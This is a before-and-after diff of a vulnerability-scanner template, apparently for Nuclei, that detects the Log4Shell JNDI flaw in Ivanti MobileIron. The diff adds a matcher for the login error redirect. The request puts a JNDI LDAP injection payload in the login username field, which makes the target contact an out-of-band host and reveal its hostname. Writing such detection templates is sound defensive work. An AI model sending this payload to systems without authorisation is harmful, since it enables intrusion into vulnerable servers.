vulnerabilities/mobileiron/mobileiron-log4j-jndi-rce.yaml (before)
id: mobileiron-log4j-jndi-rce

info:
  name: Ivanti MobileIron - JNDI Remote Command Execution (Apache Log4j)
  author: meme-lord
  severity: critical
  description: Ivanti MobileIron Apache Log4j2 <=2.14.1 JNDI in features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.
  reference:
    - https://github.com/advisories/GHSA-jfh8-c2jp-5v3q
    - https://www.lunasec.io/docs/blog/log4j-zero-day/
    - https://www.zdnet.com/article/mobileiron-customers-urged-to-patch-systems-due-to-potential-log4j-exploitation/
    - https://logging.apache.org/log4j/2.x/security.html
    - https://nvd.nist.gov/vuln/detail/CVE-2021-44228
  remediation: Upgrade to version 2.14.2 or higher of MobileIron. If this is not possible, several Log4j exploit workarounds are available.
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cve-id: CVE-2021-44228
    cwe-id: CWE-917
  metadata:
    shodan-query: http.html:"MobileIron"
    verified: "true"
  tags: jndi,log4j,rce,cve,cve2021,ivanti,oast,mobileiron,kev

requests:
  - raw:
      - |
        POST /mifs/j_spring_security_check HTTP/1.1
        Referer: {{RootURL}}/mifs/user/login.jsp
        Content-Type: application/x-www-form-urlencoded

        j_username=${jndi:ldap://${hostName}.{{interactsh-url}}}&j_password=password&logincontext=employee

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol  # Confirms the DNS Interaction
        words:
          - "dns"

      - type: regex
        part: interactsh_request
        regex:
          - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'  # Match for extracted ${hostName} variable

    extractors:
      - type: regex
        part: interactsh_request
        group: 1
        regex:
          - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'  # Print extracted ${hostName} in output

# Enhanced by cs on 2022/02/28

vulnerabilities/mobileiron/mobileiron-log4j-jndi-rce.yaml (after)
id: mobileiron-log4j-jndi-rce

info:
  name: Ivanti MobileIron - JNDI Remote Command Execution (Apache Log4j)
  author: meme-lord
  severity: critical
  description: Ivanti MobileIron Apache Log4j2 <=2.14.1 JNDI in features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.
  reference:
    - https://github.com/advisories/GHSA-jfh8-c2jp-5v3q
    - https://www.lunasec.io/docs/blog/log4j-zero-day/
    - https://www.zdnet.com/article/mobileiron-customers-urged-to-patch-systems-due-to-potential-log4j-exploitation/
    - https://logging.apache.org/log4j/2.x/security.html
    - https://nvd.nist.gov/vuln/detail/CVE-2021-44228
  remediation: Upgrade to version 2.14.2 or higher of MobileIron. If this is not possible, several Log4j exploit workarounds are available.
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cve-id: CVE-2021-44228
    cwe-id: CWE-917
  metadata:
    shodan-query: http.html:"MobileIron"
    verified: "true"
  tags: jndi,log4j,rce,cve,cve2021,ivanti,oast,mobileiron,kev

requests:
  - raw:
      - |
        POST /mifs/j_spring_security_check HTTP/1.1
        Referer: {{RootURL}}/mifs/user/login.jsp
        Content-Type: application/x-www-form-urlencoded

        j_username=${jndi:ldap://${hostName}.{{interactsh-url}}}&j_password=password&logincontext=employee

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol  # Confirms the DNS Interaction
        words:
          - "dns"

      - type: word
        part: location
        words:
          - '/mifs/user/login.jsp?error=1'

      - type: regex
        part: interactsh_request
        regex:
          - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'  # Match for extracted ${hostName} variable

    extractors:
      - type: regex
        part: interactsh_request
        group: 1
        regex:
          - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'  # Print extracted ${hostName} in output

vulnerabilities/mobileiron/mobileiron-log4j-jndi-rce.yaml (diff)
@@ -38,6 +38,11 @@ requests:
         words:
           - "dns"
 
+      - type: word
+        part: location
+        words:
+          - '/mifs/user/login.jsp?error=1'
+
       - type: regex
         part: interactsh_request
         regex:
@@ -49,5 +54,3 @@ requests:
         group: 1
         regex:
           - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'  # Print extracted ${hostName} in output
-
-# Enhanced by cs on 2022/02/28
